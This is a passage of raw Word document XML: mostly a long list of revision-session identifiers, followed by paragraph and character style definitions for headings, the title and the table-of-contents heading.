    <w:rsid w:val="00FA6A55"/>
    <w:rsid w:val="00FA6E75"/>
    <w:rsid w:val="00FA6ED6"/>
    <w:rsid w:val="00FA709F"/>
    <w:rsid w:val="00FA7644"/>
    <w:rsid w:val="00FA788D"/>
    <w:rsid w:val="00FA7C50"/>
    <w:rsid w:val="00FA7D3B"/>
    <w:rsid w:val="00FB0694"/>
    <w:rsid w:val="00FB098E"/>
    <w:rsid w:val="00FB0A37"/>
    <w:rsid w:val="00FB0AE5"/>
    <w:rsid w:val="00FB18A1"/>
    <w:rsid w:val="00FB19FD"/>
    <w:rsid w:val="00FB1B6A"/>
    <w:rsid w:val="00FB2092"/>
    <w:rsid w:val="00FB249B"/>
    <w:rsid w:val="00FB287C"/>
    <w:rsid w:val="00FB2A16"/>
    <w:rsid w:val="00FB38A7"/>
    <w:rsid w:val="00FB3C4A"/>
    <w:rsid w:val="00FB41D5"/>
    <w:rsid w:val="00FB4828"/>
    <w:rsid w:val="00FB4A4D"/>
    <w:rsid w:val="00FB4AC3"/>
    <w:rsid w:val="00FB4FE5"/>
    <w:rsid w:val="00FB501E"/>
    <w:rsid w:val="00FB51E9"/>
    <w:rsid w:val="00FB54E7"/>
    <w:rsid w:val="00FB5C52"/>
    <w:rsid w:val="00FB5C90"/>
    <w:rsid w:val="00FB5CC5"/>
    <w:rsid w:val="00FB66ED"/>
    <w:rsid w:val="00FB7399"/>
    <w:rsid w:val="00FC0587"/>
    <w:rsid w:val="00FC09B2"/>
    <w:rsid w:val="00FC12A0"/>
    <w:rsid w:val="00FC34B4"/>
    <w:rsid w:val="00FC37CF"/>
    <w:rsid w:val="00FC38CB"/>
    <w:rsid w:val="00FC3E7A"/>
    <w:rsid w:val="00FC431E"/>
    <w:rsid w:val="00FC4648"/>
    <w:rsid w:val="00FC467C"/>
    <w:rsid w:val="00FC48EA"/>
    <w:rsid w:val="00FC4D9C"/>
    <w:rsid w:val="00FC6042"/>
    <w:rsid w:val="00FC694D"/>
    <w:rsid w:val="00FC6DBB"/>
    <w:rsid w:val="00FC755A"/>
    <w:rsid w:val="00FC765E"/>
    <w:rsid w:val="00FC7869"/>
    <w:rsid w:val="00FC7915"/>
    <w:rsid w:val="00FC79AF"/>
    <w:rsid w:val="00FC7A95"/>
    <w:rsid w:val="00FD0002"/>
    <w:rsid w:val="00FD03B7"/>
    <w:rsid w:val="00FD0641"/>
    <w:rsid w:val="00FD11E9"/>
    <w:rsid w:val="00FD1516"/>
    <w:rsid w:val="00FD1B5C"/>
    <w:rsid w:val="00FD1EBC"/>
    <w:rsid w:val="00FD1FB0"/>
    <w:rsid w:val="00FD45BD"/>
    <w:rsid w:val="00FD494B"/>
    <w:rsid w:val="00FD4E8A"/>
    <w:rsid w:val="00FD51D7"/>
    <w:rsid w:val="00FD5453"/>
    <w:rsid w:val="00FD5488"/>
    <w:rsid w:val="00FD54F2"/>
    <w:rsid w:val="00FD5BCF"/>
    <w:rsid w:val="00FD6771"/>
    <w:rsid w:val="00FD6CA6"/>
    <w:rsid w:val="00FD7129"/>
    <w:rsid w:val="00FD776F"/>
    <w:rsid w:val="00FD7C87"/>
    <w:rsid w:val="00FE0429"/>
    <w:rsid w:val="00FE103F"/>
    <w:rsid w:val="00FE1136"/>
    <w:rsid w:val="00FE1C7A"/>
    <w:rsid w:val="00FE1CB5"/>
    <w:rsid w:val="00FE1E40"/>
    <w:rsid w:val="00FE2437"/>
    <w:rsid w:val="00FE2826"/>
    <w:rsid w:val="00FE4A8A"/>
    <w:rsid w:val="00FE4EF0"/>
    <w:rsid w:val="00FE56DD"/>
    <w:rsid w:val="00FE5BAA"/>
    <w:rsid w:val="00FE5D77"/>
    <w:rsid w:val="00FE67AF"/>
    <w:rsid w:val="00FE68A5"/>
    <w:rsid w:val="00FE6DBA"/>
    <w:rsid w:val="00FE7155"/>
    <w:rsid w:val="00FE7573"/>
    <w:rsid w:val="00FE78DB"/>
    <w:rsid w:val="00FE796E"/>
    <w:rsid w:val="00FE7C35"/>
    <w:rsid w:val="00FE7D16"/>
    <w:rsid w:val="00FE7DB6"/>
    <w:rsid w:val="00FF0588"/>
    <w:rsid w:val="00FF0BCD"/>
    <w:rsid w:val="00FF14A7"/>
    <w:rsid w:val="00FF1C06"/>
    <w:rsid w:val="00FF2131"/>
    <w:rsid w:val="00FF217D"/>
    <w:rsid w:val="00FF24E7"/>
    <w:rsid w:val="00FF2882"/>
    <w:rsid w:val="00FF2B69"/>
    <w:rsid w:val="00FF3163"/>
    <w:rsid w:val="00FF3A4F"/>
    <w:rsid w:val="00FF3EBA"/>
    <w:rsid w:val="00FF3EC8"/>
    <w:rsid w:val="00FF3F4C"/>
    <w:rsid w:val="00FF472E"/>
    <w:rsid w:val="00FF4D5A"/>
    <w:rsid w:val="00FF5B27"/>
    <w:rsid w:val="00FF5B4C"/>
    <w:rsid w:val="00FF5CE0"/>
    <w:rsid w:val="00FF5D89"/>
    <w:rsid w:val="00FF60AE"/>
    <w:rsid w:val="00FF61AE"/>
    <w:rsid w:val="00FF61EA"/>
    <w:rsid w:val="00FF6265"/>
    <w:rsid w:val="00FF716D"/>
    <w:rsid w:val="00FF7C59"/>
    <w:rsid w:val="00FF7D56"/>
    <w:rsid w:val="01026FE2"/>
    <w:rsid w:val="0205289A"/>
    <w:rsid w:val="0242D894"/>
    <w:rsid w:val="027E22CD"/>
    <w:rsid w:val="02E069B0"/>
    <w:rsid w:val="02F52FA9"/>
    <w:rsid w:val="03304D10"/>
    <w:rsid w:val="033F0A21"/>
    <w:rsid w:val="034DA0E5"/>
    <w:rsid w:val="038AC0B7"/>
    <w:rsid w:val="039FBD22"/>
    <w:rsid w:val="03B1AB8E"/>
    <w:rsid w:val="03D59C86"/>
    <w:rsid w:val="03E72106"/>
    <w:rsid w:val="042C4B30"/>
    <w:rsid w:val="047E4AFD"/>
    <w:rsid w:val="04968844"/>
    <w:rsid w:val="04B21256"/>
    <w:rsid w:val="04F9EAFA"/>
    <w:rsid w:val="0502765C"/>
    <w:rsid w:val="0530B4FF"/>
    <w:rsid w:val="05597771"/>
    <w:rsid w:val="05640104"/>
    <w:rsid w:val="05F434EA"/>
    <w:rsid w:val="0655E254"/>
    <w:rsid w:val="0664A489"/>
    <w:rsid w:val="06DA9592"/>
    <w:rsid w:val="070AE0A9"/>
    <w:rsid w:val="078D6A53"/>
    <w:rsid w:val="07A29182"/>
    <w:rsid w:val="08987CC1"/>
    <w:rsid w:val="08F343B4"/>
    <w:rsid w:val="096E373E"/>
    <w:rsid w:val="0977F72E"/>
    <w:rsid w:val="09C7C12D"/>
    <w:rsid w:val="09D01511"/>
    <w:rsid w:val="0A320409"/>
    <w:rsid w:val="0AC75284"/>
    <w:rsid w:val="0ACC7A5A"/>
    <w:rsid w:val="0AF2D52D"/>
    <w:rsid w:val="0B0B0747"/>
    <w:rsid w:val="0B222F4C"/>
    <w:rsid w:val="0B22AB14"/>
    <w:rsid w:val="0B5EE751"/>
    <w:rsid w:val="0B8B169E"/>
    <w:rsid w:val="0BAE2B6D"/>
    <w:rsid w:val="0CF53505"/>
    <w:rsid w:val="0D6FAA80"/>
    <w:rsid w:val="0D71770D"/>
    <w:rsid w:val="0D8B1460"/>
    <w:rsid w:val="0DA40BAB"/>
    <w:rsid w:val="0DAE59AD"/>
    <w:rsid w:val="0DB06286"/>
    <w:rsid w:val="0DDE9AC0"/>
    <w:rsid w:val="0E05B308"/>
    <w:rsid w:val="0E5DCCAF"/>
    <w:rsid w:val="0F05752C"/>
    <w:rsid w:val="0F1DF80C"/>
    <w:rsid w:val="0F78B2E4"/>
    <w:rsid w:val="0F7AC6AA"/>
    <w:rsid w:val="0FD7C697"/>
    <w:rsid w:val="102DD3BD"/>
    <w:rsid w:val="105FB0C7"/>
    <w:rsid w:val="10A4784E"/>
    <w:rsid w:val="10B178D0"/>
    <w:rsid w:val="10C3EAC2"/>
    <w:rsid w:val="11983447"/>
    <w:rsid w:val="11A9EF3C"/>
    <w:rsid w:val="11CF2AF9"/>
    <w:rsid w:val="121EBB2C"/>
    <w:rsid w:val="128D8AC3"/>
    <w:rsid w:val="133F2537"/>
    <w:rsid w:val="134E99E9"/>
    <w:rsid w:val="139CEAFC"/>
    <w:rsid w:val="13A731A3"/>
    <w:rsid w:val="13E351A0"/>
    <w:rsid w:val="13FAE2C3"/>
    <w:rsid w:val="13FC233A"/>
    <w:rsid w:val="141F3967"/>
    <w:rsid w:val="14639A69"/>
    <w:rsid w:val="147A5BAC"/>
    <w:rsid w:val="14B28EC5"/>
    <w:rsid w:val="14E3BFD1"/>
    <w:rsid w:val="15399572"/>
    <w:rsid w:val="15A7E164"/>
    <w:rsid w:val="15BE4DC4"/>
    <w:rsid w:val="15C9361D"/>
    <w:rsid w:val="15CFF32A"/>
    <w:rsid w:val="160C0853"/>
    <w:rsid w:val="1633B367"/>
    <w:rsid w:val="166EAB9F"/>
    <w:rsid w:val="16B1E856"/>
    <w:rsid w:val="16D8774C"/>
    <w:rsid w:val="1728889B"/>
    <w:rsid w:val="1745D864"/>
    <w:rsid w:val="178BD550"/>
    <w:rsid w:val="18486770"/>
    <w:rsid w:val="187F4EE8"/>
    <w:rsid w:val="18AA1736"/>
    <w:rsid w:val="18FC2889"/>
    <w:rsid w:val="192BB2CC"/>
    <w:rsid w:val="193B3A7C"/>
    <w:rsid w:val="19A07AED"/>
    <w:rsid w:val="19C782E5"/>
    <w:rsid w:val="1A00233A"/>
    <w:rsid w:val="1A691B2F"/>
    <w:rsid w:val="1AB6C939"/>
    <w:rsid w:val="1AC9EE78"/>
    <w:rsid w:val="1AD072EB"/>
    <w:rsid w:val="1AFBF27A"/>
    <w:rsid w:val="1B645984"/>
    <w:rsid w:val="1B837920"/>
    <w:rsid w:val="1BEBE5BA"/>
    <w:rsid w:val="1C3B022B"/>
    <w:rsid w:val="1C434957"/>
    <w:rsid w:val="1C68C2F2"/>
    <w:rsid w:val="1C91DDCC"/>
    <w:rsid w:val="1CBE99A1"/>
    <w:rsid w:val="1CEEA6FF"/>
    <w:rsid w:val="1CF89FD4"/>
    <w:rsid w:val="1CFF5C1C"/>
    <w:rsid w:val="1D9FA9F8"/>
    <w:rsid w:val="1DA8512C"/>
    <w:rsid w:val="1DB58E8C"/>
    <w:rsid w:val="1E0173B9"/>
    <w:rsid w:val="1E588B9F"/>
    <w:rsid w:val="1E6E0E4C"/>
    <w:rsid w:val="1E6FD782"/>
    <w:rsid w:val="1E978415"/>
    <w:rsid w:val="1ECD75BF"/>
    <w:rsid w:val="1F47192E"/>
    <w:rsid w:val="1F80FD7C"/>
    <w:rsid w:val="1FBA9AA1"/>
    <w:rsid w:val="200B3E8B"/>
    <w:rsid w:val="205E7A12"/>
    <w:rsid w:val="208EF539"/>
    <w:rsid w:val="20AF7233"/>
    <w:rsid w:val="216C6E23"/>
    <w:rsid w:val="22895B7C"/>
    <w:rsid w:val="22CBECF4"/>
    <w:rsid w:val="22F44967"/>
    <w:rsid w:val="23366B1F"/>
    <w:rsid w:val="23D2B9FE"/>
    <w:rsid w:val="241CE188"/>
    <w:rsid w:val="24D2D8D7"/>
    <w:rsid w:val="24D77878"/>
    <w:rsid w:val="24F298C8"/>
    <w:rsid w:val="2527F128"/>
    <w:rsid w:val="25368D78"/>
    <w:rsid w:val="2551A949"/>
    <w:rsid w:val="256412AF"/>
    <w:rsid w:val="2670A9BE"/>
    <w:rsid w:val="267B521A"/>
    <w:rsid w:val="2686CC1B"/>
    <w:rsid w:val="26A60BC8"/>
    <w:rsid w:val="26CE5C66"/>
    <w:rsid w:val="2784173F"/>
    <w:rsid w:val="27BB3FEB"/>
    <w:rsid w:val="27D2A036"/>
    <w:rsid w:val="2816F728"/>
    <w:rsid w:val="28538E66"/>
    <w:rsid w:val="28D51C03"/>
    <w:rsid w:val="28EBBDA0"/>
    <w:rsid w:val="291972C3"/>
    <w:rsid w:val="29721189"/>
    <w:rsid w:val="29A4198F"/>
    <w:rsid w:val="29C8AECD"/>
    <w:rsid w:val="2AA571FE"/>
    <w:rsid w:val="2AEB5A3E"/>
    <w:rsid w:val="2B22C771"/>
    <w:rsid w:val="2B64F0BF"/>
    <w:rsid w:val="2B7306D2"/>
    <w:rsid w:val="2B92AE23"/>
    <w:rsid w:val="2B9988C5"/>
    <w:rsid w:val="2BDFDDDC"/>
    <w:rsid w:val="2BE8A11A"/>
    <w:rsid w:val="2C1DD20B"/>
    <w:rsid w:val="2CCFF1C5"/>
    <w:rsid w:val="2CE8482F"/>
    <w:rsid w:val="2D0A8D9C"/>
    <w:rsid w:val="2D687BF9"/>
    <w:rsid w:val="2D6E7859"/>
    <w:rsid w:val="2DE9F5C9"/>
    <w:rsid w:val="2E3813D8"/>
    <w:rsid w:val="2E73E8CE"/>
    <w:rsid w:val="2EB832EF"/>
    <w:rsid w:val="2F5A1172"/>
    <w:rsid w:val="2F866948"/>
    <w:rsid w:val="2FC13292"/>
    <w:rsid w:val="302BF9EE"/>
    <w:rsid w:val="303F7285"/>
    <w:rsid w:val="30C27AB9"/>
    <w:rsid w:val="31534675"/>
    <w:rsid w:val="317E7137"/>
    <w:rsid w:val="31982997"/>
    <w:rsid w:val="331BD55C"/>
    <w:rsid w:val="335756AC"/>
    <w:rsid w:val="33637955"/>
    <w:rsid w:val="336B73C2"/>
    <w:rsid w:val="337845E5"/>
    <w:rsid w:val="339BB19B"/>
    <w:rsid w:val="3420BEDC"/>
    <w:rsid w:val="34316CAF"/>
    <w:rsid w:val="3454A933"/>
    <w:rsid w:val="3474FE7A"/>
    <w:rsid w:val="34F412E5"/>
    <w:rsid w:val="35102C20"/>
    <w:rsid w:val="353BD946"/>
    <w:rsid w:val="3542105B"/>
    <w:rsid w:val="3590352D"/>
    <w:rsid w:val="35F6E840"/>
    <w:rsid w:val="3605D3E3"/>
    <w:rsid w:val="36D7601B"/>
    <w:rsid w:val="36E12CD9"/>
    <w:rsid w:val="36E1CBBE"/>
    <w:rsid w:val="375DB83C"/>
    <w:rsid w:val="37C64FA2"/>
    <w:rsid w:val="37E5898C"/>
    <w:rsid w:val="380E8FAE"/>
    <w:rsid w:val="388326B3"/>
    <w:rsid w:val="3987C119"/>
    <w:rsid w:val="398C6381"/>
    <w:rsid w:val="399C93EB"/>
    <w:rsid w:val="3A0C3E3E"/>
    <w:rsid w:val="3ACBF092"/>
    <w:rsid w:val="3AD04123"/>
    <w:rsid w:val="3ADD6B9D"/>
    <w:rsid w:val="3AE7D1F9"/>
    <w:rsid w:val="3AF32EA8"/>
    <w:rsid w:val="3B244A05"/>
    <w:rsid w:val="3B320126"/>
    <w:rsid w:val="3B56F783"/>
    <w:rsid w:val="3B6F980F"/>
    <w:rsid w:val="3BE19891"/>
    <w:rsid w:val="3C20F5F7"/>
    <w:rsid w:val="3C45DC95"/>
    <w:rsid w:val="3CC73B77"/>
    <w:rsid w:val="3CE0E5A4"/>
    <w:rsid w:val="3DC19C8E"/>
    <w:rsid w:val="3DCCA061"/>
    <w:rsid w:val="3DF1D2FB"/>
    <w:rsid w:val="3E99A1AE"/>
    <w:rsid w:val="3EBA7186"/>
    <w:rsid w:val="3EE426D8"/>
    <w:rsid w:val="3F1674ED"/>
    <w:rsid w:val="4016B2FF"/>
    <w:rsid w:val="406A0A3F"/>
    <w:rsid w:val="41078500"/>
    <w:rsid w:val="4132BD3E"/>
    <w:rsid w:val="4162FC0E"/>
    <w:rsid w:val="41FF6513"/>
    <w:rsid w:val="4230F142"/>
    <w:rsid w:val="4274F007"/>
    <w:rsid w:val="42C831DE"/>
    <w:rsid w:val="4307B088"/>
    <w:rsid w:val="436E331C"/>
    <w:rsid w:val="43BCD0AC"/>
    <w:rsid w:val="4400BA85"/>
    <w:rsid w:val="4464C1FF"/>
    <w:rsid w:val="449D8384"/>
    <w:rsid w:val="45A5ABAF"/>
    <w:rsid w:val="45BA30F4"/>
    <w:rsid w:val="46221E4E"/>
    <w:rsid w:val="466B70F1"/>
    <w:rsid w:val="46830F3B"/>
    <w:rsid w:val="468B6798"/>
    <w:rsid w:val="46DF011B"/>
    <w:rsid w:val="47689F33"/>
    <w:rsid w:val="48424598"/>
    <w:rsid w:val="486D4604"/>
    <w:rsid w:val="48D7B0BB"/>
    <w:rsid w:val="49387301"/>
    <w:rsid w:val="4969A598"/>
    <w:rsid w:val="49C02AC5"/>
    <w:rsid w:val="49C24EAD"/>
    <w:rsid w:val="49FF9BDA"/>
    <w:rsid w:val="4A127882"/>
    <w:rsid w:val="4A575D94"/>
    <w:rsid w:val="4AA0444E"/>
    <w:rsid w:val="4AAE0EAB"/>
    <w:rsid w:val="4B39E7CF"/>
    <w:rsid w:val="4B59D193"/>
    <w:rsid w:val="4BD21784"/>
    <w:rsid w:val="4BEA2622"/>
    <w:rsid w:val="4BF4E428"/>
    <w:rsid w:val="4BF8F548"/>
    <w:rsid w:val="4C06F4C9"/>
    <w:rsid w:val="4CD80D12"/>
    <w:rsid w:val="4CEB9101"/>
    <w:rsid w:val="4D0E7FA0"/>
    <w:rsid w:val="4E56C577"/>
    <w:rsid w:val="4F04247E"/>
    <w:rsid w:val="4F24D228"/>
    <w:rsid w:val="4FA46098"/>
    <w:rsid w:val="4FBC05A2"/>
    <w:rsid w:val="4FCE10A7"/>
    <w:rsid w:val="4FEEBDD6"/>
    <w:rsid w:val="4FF921C6"/>
    <w:rsid w:val="50531451"/>
    <w:rsid w:val="50701CF0"/>
    <w:rsid w:val="50841269"/>
    <w:rsid w:val="50A55F7C"/>
    <w:rsid w:val="50E01306"/>
    <w:rsid w:val="50F96E5E"/>
    <w:rsid w:val="51299C66"/>
    <w:rsid w:val="51AA02F4"/>
    <w:rsid w:val="51B8D12D"/>
    <w:rsid w:val="51F16F09"/>
    <w:rsid w:val="523F8389"/>
    <w:rsid w:val="52D7CA44"/>
    <w:rsid w:val="53068215"/>
    <w:rsid w:val="53232A5C"/>
    <w:rsid w:val="537E3A6C"/>
    <w:rsid w:val="53BA1EC8"/>
    <w:rsid w:val="53E274D0"/>
    <w:rsid w:val="53E3B204"/>
    <w:rsid w:val="54408A3D"/>
    <w:rsid w:val="5449FD2F"/>
    <w:rsid w:val="54850B92"/>
    <w:rsid w:val="54994014"/>
    <w:rsid w:val="54BDB8BC"/>
    <w:rsid w:val="54C1FF4B"/>
    <w:rsid w:val="54FBDAF0"/>
    <w:rsid w:val="5509B8DA"/>
    <w:rsid w:val="5561D569"/>
    <w:rsid w:val="55861544"/>
    <w:rsid w:val="55EBA9A8"/>
    <w:rsid w:val="56172673"/>
    <w:rsid w:val="566915CE"/>
    <w:rsid w:val="571F398D"/>
    <w:rsid w:val="5725EFC2"/>
    <w:rsid w:val="5797C5C2"/>
    <w:rsid w:val="57BDDA9A"/>
    <w:rsid w:val="57EA1A7A"/>
    <w:rsid w:val="582D713B"/>
    <w:rsid w:val="583E4C99"/>
    <w:rsid w:val="584E468B"/>
    <w:rsid w:val="58925610"/>
    <w:rsid w:val="58BF829F"/>
    <w:rsid w:val="58D7A3B2"/>
    <w:rsid w:val="58EF332E"/>
    <w:rsid w:val="58F577FE"/>
    <w:rsid w:val="5976ABBD"/>
    <w:rsid w:val="59BF094A"/>
    <w:rsid w:val="5A0FA6CE"/>
    <w:rsid w:val="5AC6666E"/>
    <w:rsid w:val="5ACA6492"/>
    <w:rsid w:val="5B4D53AC"/>
    <w:rsid w:val="5B58D477"/>
    <w:rsid w:val="5B832E6A"/>
    <w:rsid w:val="5B9E4F30"/>
    <w:rsid w:val="5BE1D438"/>
    <w:rsid w:val="5C4D15D5"/>
    <w:rsid w:val="5CE58E59"/>
    <w:rsid w:val="5D3EC35A"/>
    <w:rsid w:val="5D66C719"/>
    <w:rsid w:val="5E850F04"/>
    <w:rsid w:val="5EE07EFC"/>
    <w:rsid w:val="5EF22A7F"/>
    <w:rsid w:val="5F31B901"/>
    <w:rsid w:val="5F470232"/>
    <w:rsid w:val="5F73802C"/>
    <w:rsid w:val="5FA5DAFB"/>
    <w:rsid w:val="601B7525"/>
    <w:rsid w:val="607620BA"/>
    <w:rsid w:val="6088D9E4"/>
    <w:rsid w:val="60B97552"/>
    <w:rsid w:val="610B66B9"/>
    <w:rsid w:val="61994010"/>
    <w:rsid w:val="61AFF69D"/>
    <w:rsid w:val="61EB4898"/>
    <w:rsid w:val="62526FB6"/>
    <w:rsid w:val="62617F84"/>
    <w:rsid w:val="62BF3929"/>
    <w:rsid w:val="635863CE"/>
    <w:rsid w:val="640C77A8"/>
    <w:rsid w:val="641F8D5D"/>
    <w:rsid w:val="6470D918"/>
    <w:rsid w:val="648C6EBE"/>
    <w:rsid w:val="64F91B94"/>
    <w:rsid w:val="6515059C"/>
    <w:rsid w:val="65381DEB"/>
    <w:rsid w:val="6555E46E"/>
    <w:rsid w:val="65D505BA"/>
    <w:rsid w:val="65E194DB"/>
    <w:rsid w:val="65F23859"/>
    <w:rsid w:val="662026FB"/>
    <w:rsid w:val="6625B435"/>
    <w:rsid w:val="665F47B2"/>
    <w:rsid w:val="6720A52C"/>
    <w:rsid w:val="6732D4F5"/>
    <w:rsid w:val="67331503"/>
    <w:rsid w:val="673BD7F7"/>
    <w:rsid w:val="6772E3D8"/>
    <w:rsid w:val="67826ADD"/>
    <w:rsid w:val="6789D6B5"/>
    <w:rsid w:val="67B00D2A"/>
    <w:rsid w:val="67B3C6B9"/>
    <w:rsid w:val="67F66CE0"/>
    <w:rsid w:val="67F70414"/>
    <w:rsid w:val="67FABF6C"/>
    <w:rsid w:val="680DEB7F"/>
    <w:rsid w:val="682CA9BD"/>
    <w:rsid w:val="683DE8FA"/>
    <w:rsid w:val="688220E4"/>
    <w:rsid w:val="688B007C"/>
    <w:rsid w:val="693CC833"/>
    <w:rsid w:val="6941BD17"/>
    <w:rsid w:val="694FF0DB"/>
    <w:rsid w:val="697E3B5D"/>
    <w:rsid w:val="699A6C75"/>
    <w:rsid w:val="69AEFF29"/>
    <w:rsid w:val="69C729E2"/>
    <w:rsid w:val="6A5C1A63"/>
    <w:rsid w:val="6A908E63"/>
    <w:rsid w:val="6B03BABA"/>
    <w:rsid w:val="6B297DC0"/>
    <w:rsid w:val="6B56395D"/>
    <w:rsid w:val="6B6D4190"/>
    <w:rsid w:val="6B81E17A"/>
    <w:rsid w:val="6C1FCAC6"/>
    <w:rsid w:val="6C27C0BE"/>
    <w:rsid w:val="6CC81142"/>
    <w:rsid w:val="6D82EFBD"/>
    <w:rsid w:val="6DBDA5A6"/>
    <w:rsid w:val="6DC9849F"/>
    <w:rsid w:val="6DFC645E"/>
    <w:rsid w:val="6E0A22B2"/>
    <w:rsid w:val="6E86CC96"/>
    <w:rsid w:val="6F7A1F42"/>
    <w:rsid w:val="6FF1E6A8"/>
    <w:rsid w:val="7002DAAA"/>
    <w:rsid w:val="700E685D"/>
    <w:rsid w:val="7027F528"/>
    <w:rsid w:val="706279FD"/>
    <w:rsid w:val="7082D00D"/>
    <w:rsid w:val="70A9AFAA"/>
    <w:rsid w:val="717C2228"/>
    <w:rsid w:val="71A75967"/>
    <w:rsid w:val="71B006BA"/>
    <w:rsid w:val="71DDBC71"/>
    <w:rsid w:val="72A4FF6F"/>
    <w:rsid w:val="72B4948A"/>
    <w:rsid w:val="72EA33D0"/>
    <w:rsid w:val="737CF96B"/>
    <w:rsid w:val="7393CAEA"/>
    <w:rsid w:val="73B66318"/>
    <w:rsid w:val="73ED08F9"/>
    <w:rsid w:val="7425FBB5"/>
    <w:rsid w:val="7457FD82"/>
    <w:rsid w:val="74E019B9"/>
    <w:rsid w:val="74FFFF2E"/>
    <w:rsid w:val="75032E5D"/>
    <w:rsid w:val="756B4546"/>
    <w:rsid w:val="7596DDE9"/>
    <w:rsid w:val="75B77BAD"/>
    <w:rsid w:val="76173997"/>
    <w:rsid w:val="764D0017"/>
    <w:rsid w:val="769F77CA"/>
    <w:rsid w:val="77189C7A"/>
    <w:rsid w:val="775F0228"/>
    <w:rsid w:val="78855364"/>
    <w:rsid w:val="78AF6644"/>
    <w:rsid w:val="78E75FBF"/>
    <w:rsid w:val="7957ABDF"/>
    <w:rsid w:val="7974EDFF"/>
    <w:rsid w:val="7A47D4CE"/>
    <w:rsid w:val="7AAC796D"/>
    <w:rsid w:val="7AFA0C98"/>
    <w:rsid w:val="7B059CFD"/>
    <w:rsid w:val="7B3A6F7F"/>
    <w:rsid w:val="7B40761B"/>
    <w:rsid w:val="7B7A830D"/>
    <w:rsid w:val="7BFDDD55"/>
    <w:rsid w:val="7CBF15BC"/>
    <w:rsid w:val="7CE68789"/>
    <w:rsid w:val="7CE9A29C"/>
    <w:rsid w:val="7CFCE0DC"/>
    <w:rsid w:val="7D047196"/>
    <w:rsid w:val="7D781B9F"/>
    <w:rsid w:val="7D929ABE"/>
    <w:rsid w:val="7D97DD67"/>
    <w:rsid w:val="7DA45DCD"/>
    <w:rsid w:val="7E008F6D"/>
    <w:rsid w:val="7E921BA4"/>
    <w:rsid w:val="7E9ACA2F"/>
    <w:rsid w:val="7EE200A3"/>
    <w:rsid w:val="7EE30604"/>
    <w:rsid w:val="7F20F514"/>
    <w:rsid w:val="7F6B6C63"/>
    <w:rsid w:val="7F7D732A"/>
    <w:rsid w:val="7FA94EE8"/>
    <w:rsid w:val="7FD28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3B5D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{80478717-9BC4-4114-A92D-A0B11FF0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EA"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00436549"/>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36549"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:spacing w:before="12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6549"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:spacing w:before="12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36549"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="7"/>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6523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523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523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523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23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549"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00436549"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="001A0FBE"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="001A0FBE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00024FED"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00436549"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00436549"/>
